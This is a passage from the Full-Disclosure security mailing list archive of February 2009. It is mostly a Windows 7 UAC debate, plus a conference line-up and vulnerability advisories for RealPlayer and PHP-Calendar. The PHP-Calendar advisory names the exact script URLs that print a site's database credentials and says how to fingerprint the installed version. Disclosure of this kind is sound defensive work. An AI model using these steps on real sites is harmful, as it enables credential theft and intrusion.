sense...I don't think Redmond missed the point at all, they're trying to introduce a concept totally new to the everyday user who, like Valdis said, only "...wants his dancing hamster screensaver.", and will blindly click any OK button that pops up. Ultimately, Valdis is right, Redmond cares about profit, and creating an OS that is irritating to the everyday jackass does not help their profits. On Thu, Feb 5, 2009 at 1:32 PM, Kevin Wilcox wrote: > 2009/2/5 Miller Grey : > > > On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. > wrote: > > >> Windows says: Hello world! Check this out, world, this is really cool. > >> Now I have, uh, something like, uh, "privileges management"! > > >> "UAC" is no more than a new commercial designation for something with > >> about 40 years. > >> And they (Redmond) are still missing the concept's point. > > > ...what? > > He's saying Microsoft has embraced and extended "privilege management" > and "introduced" it as something new, "UAC". > > He then says Microsoft is daft and missing the entire point of > privilege management, even though it's been around for decades and > their "UAC" is nothing new. > > Make sense? > > kmw > > -- > Far better is it to dare mighty things, to win glorious triumphs, even > if chequered by failure, than to take rank with those poor spirits who > neither enjoy much nor suffer much, because they live in the grey > twilight that knows not victory or defeat. > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/3bf66bb9/attachment.html From kevin at tux.appstate.edu Thu Feb 5 20:58:37 2009 From: kevin at tux.appstate.edu (Kevin Wilcox) Date: Thu, 5 Feb 2009 15:58:37 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> Message-ID: <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com> 2009/2/5 Miller Grey : > No, it doesn't make sense...I don't think Redmond missed the point at all, > they're trying to introduce a concept totally new to the everyday user who, > like Valdis said, only "...wants his dancing hamster screensaver.", and will > blindly click any OK button that pops up. Ultimately, Valdis is right, > Redmond cares about profit, and creating an OS that is irritating to the > everyday jackass does not help their profits. Wait, so is he right when he said all they care about is profit, was he right when he said they intentionally missed it or both? Microsoft market share has absolutely nothing to do with how irritating the computing experience is and has everything to do with product availability and familiarity; basically, it's carried along by inertia. Kind of like the whole, "no one was ever fired for buying [IBM|Cisco|]" deal. Most products that most companies have are MS-centric; if the products are there, and it's what people are used to, no one really gives a flying penny about how irritating the OS is to the average person unless it's completely intolerable. On a level playing field I would say yes, the quality of the computing experience would help dictate the winner in the OS game but this is *not* a level playing field and it's quite easy to just roll along simply because you already have 90%+ of the market with no serious contenders in sight. My previous post was made because rather than attempt to refute anything stated by M.B., you just replied with a "blank-stare" style "what?". I neither support nor refute his statements, I was simply rewording them. kmw -- Far better is it to dare mighty things, to win glorious triumphs, even if chequered by failure, than to take rank with those poor spirits who neither enjoy much nor suffer much, because they live in the grey twilight that knows not victory or defeat. From vigilantgregorius at gmail.com Thu Feb 5 21:25:46 2009 From: vigilantgregorius at gmail.com (Miller Grey) Date: Thu, 5 Feb 2009 15:25:46 -0600 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com> Message-ID: ...sometimes I prefer the blank-stare approach, maybe it's these neon lights radiating into my cube, or maybe it's because I find the Microsoft sucks argument boring...anyway... On Thu, Feb 5, 2009 at 2:58 PM, Kevin Wilcox wrote: > 2009/2/5 Miller Grey : > > No, it doesn't make sense...I don't think Redmond missed the point at > all, > > they're trying to introduce a concept totally new to the everyday user > who, > > like Valdis said, only "...wants his dancing hamster screensaver.", and > will > > blindly click any OK button that pops up. Ultimately, Valdis is right, > > Redmond cares about profit, and creating an OS that is irritating to the > > everyday jackass does not help their profits. > > Wait, so is he right when he said all they care about is profit, was he right when he said they intentionally missed it or both? Both...every corporation revolves exclusively around profit...and yes, they did intentionally miss the point, I would imagine MS is well-aware of the history of UNIX privilege management... Microsoft market share has absolutely nothing to do with how > irritating the computing experience is and has everything to do with > product availability and familiarity; Isn't this the same thing? Irritating consumers who know only one operating system? Consumers are upset with UAC because it is irritating, they have no concept of a control. > basically, it's carried along by > inertia. Kind of like the whole, "no one was ever fired for buying > [IBM|Cisco|]" deal. Most products that most > companies have are MS-centric; if the products are there, and it's > what people are used to, no one really gives a flying penny about how > irritating the OS is to the average person unless it's completely > intolerable. I would agree...on the assumption that the majority of consumers are Vista users since the adoption rate in the corporate world is nil...the corporate world would give a flying penny... > On a level playing field I would say yes, the quality of > the computing experience would help dictate the winner in the OS game > but this is *not* a level playing field and it's quite easy to just > roll along simply because you already have 90%+ of the market with no > serious contenders in sight. I concur...(I love saying that)... My previous post was made because rather than attempt to refute > anything stated by M.B., you just replied with a "blank-stare" style > "what?". I neither support nor refute his statements, I was simply > rewording them. In the future I will keep my blank stares to myself...but the crux of the argument to me is not whether MS sux or not (I don't care)...the argument is whether or not the concept of UAC (not who came up with) as implemented by Microsoft in Windows 7 is a good one...c'est tout cheers, vg > > kmw > > -- > Far better is it to dare mighty things, to win glorious triumphs, even > if chequered by failure, than to take rank with those poor spirits who > neither enjoy much nor suffer much, because they live in the grey > twilight that knows not victory or defeat. > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/1ad0307f/attachment.html From marcio.barbado at gmail.com Thu Feb 5 21:29:35 2009 From: marcio.barbado at gmail.com (M.B.Jr.) Date: Thu, 5 Feb 2009 19:29:35 -0200 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com> Message-ID: <2df3b0cb0902051329x78a56717i2b68af65dabb1aaa@mail.gmail.com> Comments below. On Thu, Feb 5, 2009 at 6:58 PM, Kevin Wilcox wrote: > 2009/2/5 Miller Grey : >> No, it doesn't make sense...I don't think Redmond missed the point at all, >> they're trying to introduce a concept totally new to the everyday user who, >> like Valdis said, only "...wants his dancing hamster screensaver.", and will >> blindly click any OK button that pops up. Ultimately, Valdis is right, >> Redmond cares about profit, and creating an OS that is irritating to the >> everyday jackass does not help their profits. > > Wait, so is he right when he said all they care about is profit, was > he right when he said they intentionally missed it or both? No, he isn't. But they're an enterprise, and they like money more than good code. The Marxist product-based profit posture enforced in the referred software vendor is a curse through which organizations let quality go for the mere financial benefit of some banking accounts. Agile methodologies and its horrible "extremme programming" (XP) premises constitute a few examples. -- Marcio Barbado, Jr. From cfp at ucon-conference.org Thu Feb 5 21:32:17 2009 From: cfp at ucon-conference.org (uCon Security Conference) Date: Thu, 05 Feb 2009 18:32:17 -0300 Subject: [Full-disclosure] Speaking line up confirmed! uCon Security Conference 2009 - Recife, Brazil Message-ID: <498B5AE1.5080403@ucon-conference.org> The complete list of speakers of uCon Security Conference 2009 has been announced. The organizing committee would like to thank everyone who submitted their proposals. The conference will take place three days after the most insane street carnival in the world in Recife, Brazil, on 28th February 2009 and will also feature trainings sessions on 26th and 27th. If you are outside Brazil and plan to attend to uCon, please contact us if you need any assistance on your travel. Carnival and hacking in a row, rather unique. Don't miss the chance. For more information please visit http://www.ucon-conference.org PS: All training sessions will be delivered in Portuguese. [--- SPEAKING LINE UP ---] Speaker: Jayson Street, CISSP (Stratagem One) Keynote: "Dispelling the myths and discussing the facts of global cyber-warfare" Language: English Track: Information warfare Speaker: Stephen Ridley (Matasano) Speech: "Intro to Windows Kernel Security Development" Language: English Track: Kernel hacking / reverse engineering / vuln-dev Speaker: Julio Auto (Independent researcher) Speech: "Practical (Introduction to) Reverse Engineering" Language: Portuguese Track: Reverse engineering Speaker: Rodrigo Rubira Branco aka BSDaemon (Checkpoint / COSEINC) Speech: "Advanced Payload Strategies: What is new, what works and what is hoax?" Language: Portuguese Track: Vuln-dev / shellcoding Speaker: Joseph McCray (Rapid7 / LearnSecurityOnline.com) Speech: "Advanced SQL Injection" Language: English Track: Web hacking Speaker: Gustavo Monteiro (Independent researcher) Speech: "Secure log centralization, analysis & security visualization" Language: Portuguese Track: Log & event correlation / security visualization Speaker: David Batanero (Independent researcher) Speech: "GSM for fun and profit" Language: English Track: Telecom security Speaker: Felipe Andres Manzano (Nimbuzz.com) Speech: "Exploiting PDF Readers" Language: English Track: Vuln-dev / software testing Speaker: Tiago Assumpcao (zynamics) Speech: "Ut cognitione visus: ut ipso intellecto - BinNavi 2.0" Language: Portuguese Track: Reverse engineering Speaker: Gustavo Pimentel Bittencourt and Julio Cesar Fort (Digital Trust) Speech: "From theory to practice - Bringing down the house with extended DHCP exhaustion attack" Language: Portuguese Track: Attack See you in Brazil! Sincerely, Organizing committee, uCon Security Conference http://www.ucon-conference.org From astle.j at gmail.com Thu Feb 5 19:17:32 2009 From: astle.j at gmail.com (Jimmy Astle) Date: Thu, 5 Feb 2009 14:17:32 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: I am new to the list so hello to everyone..... Now for the Windows 7 UAC stuff. 1.) Its beta.... its not going to be perfect wait for RC1 before selling 7 down the river. 2.) http://www.informationweek.com/news/security/app-security/showArticle.jhtml?articleID=213001021&subSection=News It all comes back to windows biggest issue, joe the plumber shouldn't not be running as a local admin on his box. UAC problem solved! I still dont see how redmond missed the concept. On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey wrote: > ...what? > > On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: > >> Windows says: Hello world! Check this out, world, this is really cool. >> Now I have, uh, something like, uh, "privileges management"! >> >> >> >> "UAC" is no more than a new commercial designation for something with >> about 40 years. >> And they (Redmond) are still missing the concept's point. >> >> >> >> >> >> >> On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard >> wrote: >> >> The biggest issue here is that although it's technically easy to fix >> >> this problem (just have UAC issue an alert when somebody's messing with >> >> the system settings), it involves doing more of what end users dislike >> >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >> >> does something bone-headed security-wise). >> >> >> >> Fixing this one in a way that users will put up with will be a bitch. >> > >> > Why not just have it not prompt if you are changing settings, except for >> UAC settings? that would be the simple way around it >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> >> >> -- >> Marcio Barbado, Jr. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/9e3492ec/attachment.html From noreply-secresearch at fortinet.com Fri Feb 6 01:35:01 2009 From: noreply-secresearch at fortinet.com (noreply-secresearch at fortinet.com) Date: Thu, 5 Feb 2009 17:35:01 -0800 Subject: [Full-disclosure] RealNetworks RealPlayer IVR File Processing Multiple Code Execute Vulnerabilities Message-ID: <200902060135.n161Z143024019@smtp.fortinet.com> RealNetworks RealPlayer IVR File Processing Multiple Code Execute Vulnerabilities 2009.February.05 Fortinet's FortiGuard Global Security Research Team Discovers Two Vulnerabilities in RealNetworks RealPlayer. Summary: ======== Two code execute vulnerabilities exist in RealNetworks RealPlayer 11 through malformed IVR files. Impact: ======= Remote Code Execution. Risk: ===== Critical Affected Software: ================== RealNetworks RealPlayer 11 Additional Information: ======================= Internet Video Recording (IVR) files contain media content that is played and recorded by RealPlayer. A remote attacker could craft a malicious IVR file, that when sent to an unsuspecting user, may allow the execution of arbitrary code when viewed, using one of two vulnerabilities during RealPlayer's IVR processing routine: * A heap corruption vulnerability that occurs when altering a field that determines the length of a structure * A vulnerability that allows an attacker to write one null byte to an arbitrary memory address by using an overly long file name length value It should be noted that the victim does not necessarily have to open the malicious file for exploitation to occur: the vulnerabilities lie in a DLL that is also used as a plugin for the Windows Explorer shell. A successful attack could take place by merely previewing the IVR file through Windows Explorer. Solutions: ========== The FortiGuard Global Security Research Team released the signature "RealNetworks.RealPlayer.IVR.File.Processing.Code.Execution" Fortinet customers who subscribe to Fortinet??s intrusion prevention (IPS) service should be protected against these code execute vulnerabilities. Fortinet??s IPS service is one component of FortiGuard Subscription Services, which also offer comprehensive solutions such as antivirus, Web content filtering and antispam capabilities. These services enable protection against threats on both application and network layers. FortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a combination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are delivered to all FortiGate, FortiMail and FortiClient products. Fortinet strictly follows responsible disclosure guidelines to ensure optimum protection during a threat's lifecycle. Acknowledgement: ================ Haifei Li of Fortinet's FortiGuard Global Security Research Team References: =========== FortiGuard Advisory http://www.fortiguardcenter.com/advisory/FGA-2009-04.html CVE ID: CVE-2009-0375 (one byte rewrite) http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0375 CVE ID: CVE-2009-0376 (heap corruption) http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0376 *** This email and any attachments thereto may contain private, confidential, and privileged material for the sole use of the intended recipient. Any review, copying, or distribution of this email (or any attachments thereto) by others is strictly prohibited. If you are not the intended recipient, please contact the sender immediately and permanently delete the original and any copies of this email and any attachments thereto. *** From yr42.lists at gmail.com Fri Feb 6 10:57:03 2009 From: yr42.lists at gmail.com (Yudi Rosen) Date: Fri, 6 Feb 2009 12:57:03 +0200 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: <12395eaf0902060257i21bdbc7cu6ef328f786bbe479@mail.gmail.com> But Joe the Plumber doesn't want to have to click on endless 'confirm' dialogs every time he tries to use the computer. Simply having him run as a non-admin user only fixes half the problem. On Thu, Feb 5, 2009 at 9:17 PM, Jimmy Astle wrote: > I am new to the list so hello to everyone..... > > Now for the Windows 7 UAC stuff. > > 1.) Its beta.... its not going to be perfect wait for RC1 before selling 7 > down the river. > 2.) > http://www.informationweek.com/news/security/app-security/showArticle.jhtml?articleID=213001021&subSection=News > > It all comes back to windows biggest issue, joe the plumber > shouldn't not be running as a local admin on his box. UAC problem solved! I > still dont see how redmond missed the concept. > > > > > On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey wrote: > >> ...what? >> >> On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: >> >>> Windows says: Hello world! Check this out, world, this is really cool. >>> Now I have, uh, something like, uh, "privileges management"! >>> >>> >>> >>> "UAC" is no more than a new commercial designation for something with >>> about 40 years. >>> And they (Redmond) are still missing the concept's point. >>> >>> >>> >>> >>> >>> >>> On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard >>> wrote: >>> >> The biggest issue here is that although it's technically easy to fix >>> >> this problem (just have UAC issue an alert when somebody's messing >>> with >>> >> the system settings), it involves doing more of what end users dislike >>> >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >>> >> does something bone-headed security-wise). >>> >> >>> >> Fixing this one in a way that users will put up with will be a bitch. >>> > >>> > Why not just have it not prompt if you are changing settings, except >>> for UAC settings? that would be the simple way around it >>> > >>> > _______________________________________________ >>> > Full-Disclosure - We believe in it. >>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> > Hosted and sponsored by Secunia - http://secunia.com/ >>> > >>> >>> >>> >>> -- >>> Marcio Barbado, Jr. >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/1da87862/attachment.html From kevin at tux.appstate.edu Fri Feb 6 14:36:32 2009 From: kevin at tux.appstate.edu (Kevin Wilcox) Date: Fri, 6 Feb 2009 09:36:32 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <12395eaf0902060257i21bdbc7cu6ef328f786bbe479@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <12395eaf0902060257i21bdbc7cu6ef328f786bbe479@mail.gmail.com> Message-ID: <5d6848b00902060636v6e6e7aa4o76b7538aa7cb1c3e@mail.gmail.com> 2009/2/6 Yudi Rosen : > But Joe the Plumber doesn't want to have to click on endless 'confirm' > dialogs every time he tries to use the computer. Simply having him run as a > non-admin user only fixes half the problem. No, it doesn't fix anywhere *near* half of the problem; it doesn't address that we have millions of people that use their computers without knowing anything about them. "But not every car driver needs to be a mechanic!" Yes, I know this, but every driver needs to know that there are laws and rules concerning how they drive and what happens when a 1200 kilogramme car hits a 100 kilogramme pedestrian at 70 kilometres/hour. Every driver needs to know they need to have their tyres rotated and their oil changed. There are things you must know beyond, "accelerator, decelerator and steering wheel". "But a computer isn't going to kill anyone if someone gets infected by a virus or trojan!" Yes, I know this, too, but if you're mixing questionable software and surfing habits with online banking and shopping, it's a recipe for destruction. Welcome to identity theft and empty bank accounts. We can either continue to pretend like it's *only* really crappy software or we can realise that it's a combination of easily exploitable software, user ignorance and user apathy. You can give them an operating system that has been vetted and been through multiple code reviews by people that really do know secure OS design but they wouldn't be able to accomplish anything at all. So what do we do? We give them operating systems that are less secure, hope they don't shoot their feet off and turn them loose with it - but we don't shoulder the burden of training them. Some of us do but we, as a collective, do not. Until we can properly educate our users, all we are doing is trying to mitigate risk in the best ways we can while still providing them a service. I maintain that by not educating our users we are failing in that goal. kmw -- Far better is it to dare mighty things, to win glorious triumphs, even if chequered by failure, than to take rank with those poor spirits who neither enjoy much nor suffer much, because they live in the grey twilight that knows not victory or defeat. From elazar at hushmail.com Fri Feb 6 14:53:41 2009 From: elazar at hushmail.com (Elazar Broad) Date: Fri, 06 Feb 2009 09:53:41 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised Message-ID: <20090206145342.159A328040@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Exactly, so we only make him click for non system applets/utilities, and we determine that by digital signatures, which is exactly how UAC is implemented in Windows 7. With that said, now we are back to the original issue, a computer is only as smart(or dumb, my apologies to the AI crowd) as the guy who programmed it, or in other words, how hard(or easy) is it to spoof a system applet/utility? Human nature dictates(most of the time) that we can become desensitized to things that are routine or occur often, in other words, the more UAC prompts, the more blind clicking, then again, did Joe Sixpack bother to read the first UAC prompt when he started up his shiny new Vista for the 1st time. Now, if we wired UAC up to a mouse with an electrode embedded in the left mouse button, we might have a solution. Of course the voltage would need to increase slightly over the life of the mouse in order to solve the blind shock and click problem... elazar On Fri, 06 Feb 2009 05:57:03 -0500 Yudi Rosen wrote: >But Joe the Plumber doesn't want to have to click on endless >'confirm' >dialogs every time he tries to use the computer. Simply having him >run as a >non-admin user only fixes half the problem. > >On Thu, Feb 5, 2009 at 9:17 PM, Jimmy Astle >wrote: > >> I am new to the list so hello to everyone..... >> >> Now for the Windows 7 UAC stuff. >> >> 1.) Its beta.... its not going to be perfect wait for RC1 before >selling 7 >> down the river. >> 2.) >> http://www.informationweek.com/news/security/app- >security/showArticle.jhtml?articleID=213001021&subSection=News >> >> It all comes back to windows biggest issue, joe >the plumber >> shouldn't not be running as a local admin on his box. UAC >problem solved! I >> still dont see how redmond missed the concept. >> >> >> >> >> On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey >wrote: >> >>> ...what? >>> >>> On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. > wrote: >>> >>>> Windows says: Hello world! Check this out, world, this is >really cool. >>>> Now I have, uh, something like, uh, "privileges management"! >>>> >>>> >>>> >>>> "UAC" is no more than a new commercial designation for >something with >>>> about 40 years. >>>> And they (Redmond) are still missing the concept's point. >>>> >>>> >>>> >>>> >>>> >>>> >>>> On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard >>>> wrote: >>>> >> The biggest issue here is that although it's technically >easy to fix >>>> >> this problem (just have UAC issue an alert when somebody's >messing >>>> with >>>> >> the system settings), it involves doing more of what end >users dislike >>>> >> most about UAC (it issuing alerts to Joe Sixpack all the >time when he >>>> >> does something bone-headed security-wise). >>>> >> >>>> >> Fixing this one in a way that users will put up with will >be a bitch. >>>> > >>>> > Why not just have it not prompt if you are changing >settings, except >>>> for UAC settings? that would be the simple way around it >>>> > >>>> > _______________________________________________ >>>> > Full-Disclosure - We believe in it. >>>> > Charter: http://lists.grok.org.uk/full-disclosure- >charter.html >>>> > Hosted and sponsored by Secunia - http://secunia.com/ >>>> > >>>> >>>> >>>> >>>> -- >>>> Marcio Barbado, Jr. >>>> >>>> _______________________________________________ >>>> Full-Disclosure - We believe in it. >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>> Hosted and sponsored by Secunia - http://secunia.com/ >>>> >>> >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkmMTvUACgkQi04xwClgpZib+AP9F9nse7R1YZxa1t5lfhxt7ifdsJ2g AQqj8gU3WRA2jFirU8uSCr0gNms7thdGUr9E47k8Rex2oglcuaThA/UM2CV0q+WRWyRN l9ufwQu8HhndZA/aNqjdWbubXRRUFB8x0utY2lKFdbFiiqvk7ogztZ96DzK1Ujhf/HKC IGp3Dlg= =OLph -----END PGP SIGNATURE----- -- Love Graphic Design? Find a school near you. Click Now. http://tagline.hushmail.com/fc/PnY6qxunKhUCWeXBZzoDmEq2Rrpr2dhlILwZbiXAUOMw578dWAklS/ From elazar at hushmail.com Fri Feb 6 14:55:20 2009 From: elazar at hushmail.com (Elazar Broad) Date: Fri, 06 Feb 2009 09:55:20 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised Message-ID: <20090206145520.C963B28040@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I maintain that by not educating our users we are failing in that goal. With many it is in one ear, out the other, unless you are allowed to use a clue bat... On Fri, 06 Feb 2009 09:36:32 -0500 Kevin Wilcox wrote: >2009/2/6 Yudi Rosen : > >> But Joe the Plumber doesn't want to have to click on endless >'confirm' >> dialogs every time he tries to use the computer. Simply having >him run as a >> non-admin user only fixes half the problem. > >No, it doesn't fix anywhere *near* half of the problem; it doesn't >address that we have millions of people that use their computers >without knowing anything about them. > >"But not every car driver needs to be a mechanic!" Yes, I know >this, >but every driver needs to know that there are laws and rules >concerning how they drive and what happens when a 1200 kilogramme >car >hits a 100 kilogramme pedestrian at 70 kilometres/hour. Every >driver >needs to know they need to have their tyres rotated and their oil >changed. There are things you must know beyond, "accelerator, >decelerator and steering wheel". > >"But a computer isn't going to kill anyone if someone gets >infected by >a virus or trojan!" Yes, I know this, too, but if you're mixing >questionable software and surfing habits with online banking and >shopping, it's a recipe for destruction. Welcome to identity theft >and >empty bank accounts. > >We can either continue to pretend like it's *only* really crappy >software or we can realise that it's a combination of easily >exploitable software, user ignorance and user apathy. You can give >them an operating system that has been vetted and been through >multiple code reviews by people that really do know secure OS >design >but they wouldn't be able to accomplish anything at all. So what >do we >do? We give them operating systems that are less secure, hope they >don't shoot their feet off and turn them loose with it - but we >don't >shoulder the burden of training them. Some of us do but we, as a >collective, do not. Until we can properly educate our users, all >we >are doing is trying to mitigate risk in the best ways we can while >still providing them a service. I maintain that by not educating >our >users we are failing in that goal. > >kmw > >-- >Far better is it to dare mighty things, to win glorious triumphs, >even >if chequered by failure, than to take rank with those poor spirits >who >neither enjoy much nor suffer much, because they live in the grey >twilight that knows not victory or defeat. > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQECAAYFAkmMT1gACgkQi04xwClgpZgnUgP7B0HbM0CEvXuhzgFmOuCe78TAbNsu sbc4JuWZU7sY6AqL7gHlg7MP4x6z3j49DWYtpHOHLvwThJeKzwxAthXnnaH0I6PT64Ki 5l2HO42hI+hmablEJKvqSdBCMJgk48UGONnFAPvVCuThr3yyIRpnIb9vjH5RDY093yOo KMo1FTY= =eAt7 -----END PGP SIGNATURE----- -- Protect our community. Click here to take criminal justice classes and begin a rewarding career. http://tagline.hushmail.com/fc/PnY6qxtpLJCHFvjYoeYUQ4XsQaFkOvAGtlKkYBY2VxrXTypHIfN0k/ From justin at madirish.net Fri Feb 6 15:59:18 2009 From: justin at madirish.net (Justin C. Klein Keane) Date: Fri, 06 Feb 2009 10:59:18 -0500 Subject: [Full-disclosure] PHP-Calendar SQL Credential Disclosure Message-ID: <498C5E56.5060109@madirish.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Security Risk: Moderate Exploitable: Remotely Vulnerability: Information disclosure Version: Multiple Versions PHP-Calendar (http://www.php-calendar.com) was "written for a college social group at Northeastern University to keep track of events, etc. We were previously using localendar, which I (Sean Proctor) didn't like and had some problems with. I found CST-Calendar which did most of what I wanted, but was rather ugly and missed some features that we needed. So, I gradually re-wrote CST-Calendar since that project seemed to have stopped work entirely." This vulnerability centers around the fact that PHP-Calendar comes with update scripts to update previous versions of the software. These scripts will print to the screen the database host, username, password, database name, table prefix, and database type. This file is named in two separate conventions depending on the installed version of PHP-Calendar. In versions prior to 1.1 this file is named "update.php" in version 1.1 two files exist named "update08.php" and "update10.php". Calling these files via a web browser (e.x. http://targetsite.com/phpcalendar/update.php) will print a succinct message including the above described information. Determinging version of PHP-Calendar is often trivial as a NEWS file is included in every distribution that will reveal version information. Browsing to http://targetsite.tld/phpcalendar/NEWS will display the versioning information if that file is present. Note that several versions of PHP-Calendar are affected by other vulnerabilities (SQL injection - http://www.securityfocus.com/bid/13405/, remote file inclusion - http://www.securityfocus.com/bid/12127/). Remediation Removal of the update scripts and all other unnecessary files (AUTHORS, COPYING, FAQ, INSTALL, NEWS, README, UPDATE) should remedy this vulnerability. Unfortunately instructions about the removal of these files is not included in the installation guide or the automated install scripts. - -- Justin C. Klein Keane http://www.MadIrish.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQD1AwUBSYxeVZEpbGy7DdYAAQLjfgb/dUsoJhEHQt4vO5f0TdRHwvBCgn4a9lQv OKM/Eg3jLbAVHHLitBJnN8TabGr2DUc+aJYSk62BCY2r8HrLZGsNd9fLkKWNZYKR BH7CV0LBtRyicP25NVeBPQ133Z7UYpH+cbbAmp+W00OdomPANsQcGtNzwFPuDbXo lQyGKzgLsKQD1iS+FYifkW5QC0Z5O0RkphInxTR5JGODcSVah3y3l6aWxIl0q2eq cMWR+qDY2A9fP0VzwlANhLMcgO/XI4ZmAxDKC17g/BkHTEqL/SFwuRcvoocsvcQ3 jcloc+gm+68= =kWDx -----END PGP SIGNATURE----- From rembrandt at jpberlin.de Fri Feb 6 16:01:54 2009 From: rembrandt at jpberlin.de (rembrandt) Date: Fri, 6 Feb 2009 17:01:54 +0100 Subject: [Full-disclosure] Security contacts at Netgear and/or D-Link? (DoS, pos. default PWs and other issues) Message-ID: <20090206170154.07cc41e9.rembrandt@jpberlin.de> Is somebody aware of security contacts at Netgear or D-Link? Products of those vendors do suffer from possible DoS, propably default hardcoded root accounts (D-Link) and other issues. Timeline: ZDI: Case Opened 2009-01-18 04:24 GMT-6 Case Closed 